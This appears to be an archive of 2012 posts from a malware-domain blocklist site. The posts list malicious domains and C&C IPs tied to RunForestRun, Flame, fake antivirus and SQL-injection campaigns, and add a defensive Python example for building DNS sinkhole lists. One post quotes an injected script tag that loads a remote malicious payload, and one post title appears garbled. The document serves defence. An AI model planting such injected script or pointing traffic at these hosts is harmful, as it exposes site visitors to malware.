
Runforestrun update

Posted on June 26th, 2012 in 0day,exploit by dglosser

Old versions of Plesk store passwords in clear text:
-> http://blog.unmaskparasites.com/2012/06/26/millions-of-website-passwords-stored-in-plain-text-in-plesk-panel/

A remote SQL vulnerability has also been found in old versions of Plesk, allowing attackers to retrieve those passwords:
-> http://kb.parallels.com/en/113321


Combine these two together and what do you get? Malware, of course.

Plesk Vulnerability Leading to Malware
http://blog.sucuri.net/2012/06/plesk-vulnerability-leading-to-malware.html

Runforestrun and Pseudo Random Domains
http://blog.unmaskparasites.com/2012/06/22/runforestrun-and-pseudo-random-domains/

Run, Forest! (Update) – block 95.211.27.206

https://isc.sans.edu/diary/Run+Forest+Update+/13561


We’ve added a bunch of these domains, but you should check the resources above for more, as well as for new IP addresses to block.


(Thanks to Jack W. for keeping us up-to-date on these developments.)


Two updates: runforestrun, iceix, rogues, malvertising, malspam domains…

Posted on June 25th, 2012 in 0day,malvertising,New Domains,rogue antivirus,spam by dglosser

Two recent updates, adding over 230 domains associated with RunForestRun, IceIX, malicious spam, malicious advertising, etc. Sources include www.malwaredomainlist.com, isc.sans.org, hosts-file.net and many more (all sources are listed in our domains.txt file).
Compressed files are located at: http://www.malware-domains.com (full zone files, note the dash) and http://dns-bh.sagadc.org/. We also have a mirror dedicated to research and Open Source projects – contact us for details.
NO ZONE FILES ARE LOCATED ON THIS SITE.
* Please help to keep this site free and donate whatever you can: all donations go to hosting and infrastructure costs.
* These malware block lists are provided here for free for noncommercial use as part of the fight against malware. Any commercial use of this list is strictly prohibited without prior approval.
* Please use the “datestamp” and “timestamp” files to determine if the list has been updated and ONLY pull the files you need – abusers will be banned! Use wget -N!
* Yearly sponsorships are available. Full acknowledgment, an icon, and a link back to your site will be placed in the left sidebar.
* The domains.txt file is the complete list along with the original reference. Justdomains contains a list of only the domain names. The BOOT file is in MS DNS format. The malwaredomains.zones file is in BIND format. Also available in AdBlock, ISA, and MaraDNS formats. A trusted source on WOT, the Web of Trust. Used by SURBL, MOREnet, SANS, and others…

Vulnerabilityqueerprocessbrittleness

Posted on June 19th, 2012 in 0day,rogue antivirus by dglosser

The Internet Storm Center lists a bunch of fake antivirus domains. Several are already part of our list; we’ll be adding the rest in tonight’s update. We would appreciate it if someone points us to a publicly available full list….

Flame/Flamer/Skywipe Domains & IPs

Posted on May 31st, 2012 in 0day by dglosser

Several sources have published detailed information (1, 2, 3, 4, 5) about the Flame (also known as Flamer or Skywipe) “attack toolkit”.

Some sites (1, 2) have also published the domains and IP addresses of Flame’s C&C servers…

IPs: 91.203.214.72, 91.135.66.118

Domains: traffic-spot .com, traffic-spot .biz, smart-access .net, quick-net .info


owlopadjet . info

Posted on May 19th, 2012 in 0day,iframes by dglosser

Probably should block this guy ASAP. We received an email stating that hxxp://owlopadjet . info/index.php?tp=e1909d7d62debace is infecting other websites.

See http://wepawet.iseclab.org/view.php?hash=c6f95bc490bb919ac9a9a16f8cfbcd2f&t=1337457427&type=js


sqli: Block Njukol -dot – com

Posted on April 29th, 2012 in 0day,iframes,New Domains,sql injection by dglosser

We received a report that there’s a SQL injection (sqli) campaign going on with njukol . com/r.php. Please check your web sites and add this domain to your block or shun list. Original source: http://ilion.blog47.fc2.com/

Urgent Block: nikjju.com and best-antiviruu.de.lv

Posted on April 17th, 2012 in 0day,iframes,rogue antivirus,sql injection by dglosser

Sucuri is reporting a new mass SQL injection campaign. Infected sites have the following JavaScript inserted into their pages:

<script src= http://nikjju . com/r.php ></script>

which redirects visitors to fake/rogue AV sites such as best-antiviruu. de. lv

Please add these sites to your blocklists and sinkholes ASAP.

Urgent Block: ionis90landsi -dot- rr -dot- nu — Mass Injection of WordPress Websites

Posted on March 6th, 2012 in 0day,sql injection by dglosser

Websense has posted an article about a mass SQL injection into WordPress sites. The injected domain is ionis90landsi . rr . nu (spaces added).

This link seems to have a larger list  of domains to block…

Urgent Block: BlackHole Exploit Kit redret Spam Domains

Posted on December 6th, 2011 in 0day,Domain News,malspam by dglosser

From the Internet Storm Center, please block the following domains:

  • czredret . ru
  • curedret . ru
  • ctredret . ru
  • crredret . ru
  • bzredret . ru
  • byredret . ru
  • bxredret . ru
  • bwredret . ru
  • bvredret . ru
  • bsredret . ru
  • bpredret . ru
  • boredret . ru
  • blredret . ru
  • bkredret . ru
  • biredret . ru
  • bhredret . ru
  • bgredret . ru
  • bfredret . ru
  • beredret . ru
  • bdredret . ru
  • bcredret . ru
  • bbredret . ru
  • aredret . ru
  • apredret . ru
  • amredret . ru
  • alredret . ru
  • akredret . ru
  • ajredret . ru
  • airedret . ru
  • ahredret . ru
  • agredret . ru
  • afredret . ru
  • aeredret . ru
  • adredret . ru
  • acredret . ru
  • abredret . ru
  • aaredret . ru

and be on the lookout for more domains containing the string “redret” (hmmm, I wonder if AdBlock or mywot can handle regex..).

IP addresses to block are also in the article. Also see this article. These will be added here, but you shouldn’t wait.
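Since the posts above publish domains in defanged form (“czredret . ru”, “ionis90landsi -dot- rr -dot- nu”, “hxxp://…”) and the list is shipped in BIND and hosts-style formats, here is an added example, not code from malwaredomains.com, that turns such entries into a clean blocklist, answers the regex question for a “redret”-style family, emits BIND-style zone statements and hosts lines, and checks constructed DNS query-log lines against the list. The defanging conventions, the sinkhole file path and the log lines are assumptions of this example.

```python
"""Turn defanged domains from posts like the ones above into blocklist
artifacts and check DNS query logs against them.

Added example; not code from malwaredomains.com. Assumptions: the defanging
conventions ('a . b', 'a -dot- b', 'hxxp://') are the ones used in the posts,
the BIND file path is a placeholder, and the log lines are constructed in the
style of a BIND query log.
"""
import re

# Constructed sample input, spelled the way the posts above defang domains.
SAMPLE_ENTRIES = [
    "czredret . ru",
    "curedret . ru",
    "bfredret . ru,",                      # stray comma as on the page
    "ionis90landsi -dot- rr -dot- nu",
    "hxxp://owlopadjet . info/index.php?tp=e1909d7d62debace",
    "best-antiviruu. de. lv",
    "nikjju . com/r.php",
]

# Hostname syntax check so a mangled entry cannot end up in a zone file.
VALID_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)

# Placeholder path for the sinkhole zone data (assumption, not the project's).
BIND_SINKHOLE_FILE = "/etc/namedb/blockeddomain.hosts"


def refang(entry: str) -> str:
    """Collapse ' . ', '-dot-', '[.]' spellings, drop scheme and path."""
    s = entry.strip().rstrip(",").lower()
    s = re.sub(r"^(?:hxxps?|https?)://", "", s)
    s = re.sub(r"\s*(?:-dot-|\(dot\)|\[\.\])\s*", ".", s)
    s = re.sub(r"\s*\.\s*", ".", s)
    return s.split("/", 1)[0]


def load_blocklist(entries):
    """Refang, validate and de-duplicate; invalid entries are dropped."""
    domains = {d for d in map(refang, entries) if VALID_HOSTNAME.match(d)}
    return sorted(domains)


def family_matches(domains, pattern: str):
    """Domains whose name matches a regex, e.g. the 'redret' family."""
    rx = re.compile(pattern)
    return [d for d in domains if rx.search(d)]


def to_bind_zones(domains) -> str:
    """One zone statement per domain, the layout of a BIND-style zone list."""
    return "\n".join(
        f'zone "{d}" {{type master; file "{BIND_SINKHOLE_FILE}";}};'
        for d in sorted(set(domains))
    )


def to_hosts(domains) -> str:
    """hosts-file style lines pointing each domain at 0.0.0.0."""
    return "\n".join(f"0.0.0.0 {d}" for d in sorted(set(domains)))


def is_blocked(qname: str, blocked) -> bool:
    """True if qname is a blocked domain or a subdomain of one."""
    qname = qname.lower().rstrip(".")
    parts = qname.split(".")
    # Check every suffix down to the registrable level, never the bare TLD.
    return any(".".join(parts[i:]) in blocked for i in range(len(parts) - 1))


# BIND query-log style lines (constructed, not captured from a real server).
QUERY_LOG = re.compile(r"client (\S+?)#\d+: query: (\S+) IN (\S+)")


def flag_queries(log_lines, blocked):
    """Return (client, qname) for every query to a blocked domain."""
    hits = []
    for line in log_lines:
        m = QUERY_LOG.search(line)
        if m and is_blocked(m.group(2), blocked):
            hits.append((m.group(1), m.group(2).lower()))
    return hits


SAMPLE_LOG = [
    "client 10.0.0.5#53211: query: czredret.ru IN A +",
    "client 10.0.0.9#40110: query: www.example.com IN A +",
    "client 10.0.0.7#61532: query: WWW.ionis90landsi.rr.nu IN A +",
    "client 10.0.0.7#61533: query: rr.nu IN A +",
]


if __name__ == "__main__":
    blocked = load_blocklist(SAMPLE_ENTRIES)
    print("redret family:", family_matches(blocked, r"redret"))
    print(to_bind_zones(blocked))
    print(to_hosts(blocked))
    print("flagged:", flag_queries(SAMPLE_LOG, set(blocked)))
```

The suffix walk in `is_blocked` is what makes a domain list useful as a sinkhole: a query for `www.czredret.ru` is caught by the `czredret.ru` entry, while the bare TLD `ru` is never matched, so a stray short entry cannot black-hole a whole TLD. Running the regex only over the validated list, rather than over raw log text, keeps a pattern like `redret` from firing on unrelated strings in the log.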

iframe,sqli,cybercriminal domains

Posted on December 3rd, 2011 in 0day,iframes,New Domains,Spyeye,Trojans,zeus by dglosser

A small but important update containing domains associated with iframes, cybercriminals, Zeus, and our friend lilupophilupop . com. Sources include malc0de.com, safebrowsing.google.com and www.spamhaus.org (every source is listed in the domains.txt file)…

Reminder: the mirror for compressed zip files is up and running – please contact us for details – right now it has very little usage.

Please help to keep this site free and donate whatever you can: all donations go to hosting and infrastructure costs.

These malware block lists are provided here for free for noncommercial use as part of the fight against malware. Any commercial use of this list is strictly prohibited without prior approval.

Please use the “datestamp” and “timestamp” files to determine if the list has been updated and ONLY pull the files you need – abusers will be banned!

Yearly sponsorships are available. Full acknowledgment, an icon, and a link back to your site will be placed in the left sidebar.

The domains.txt file is the complete list along with the original reference.
Justdomains contains a list of only the domain names.

The BOOT file is in MS DNS format. The spywaredomains.zones file is in BIND format.

Also available in AdBlock, ISA, and MaraDNS formats.

A trusted source on WOT, the Web of Trust. Used by SURBL, MOREnet, SANS, and others…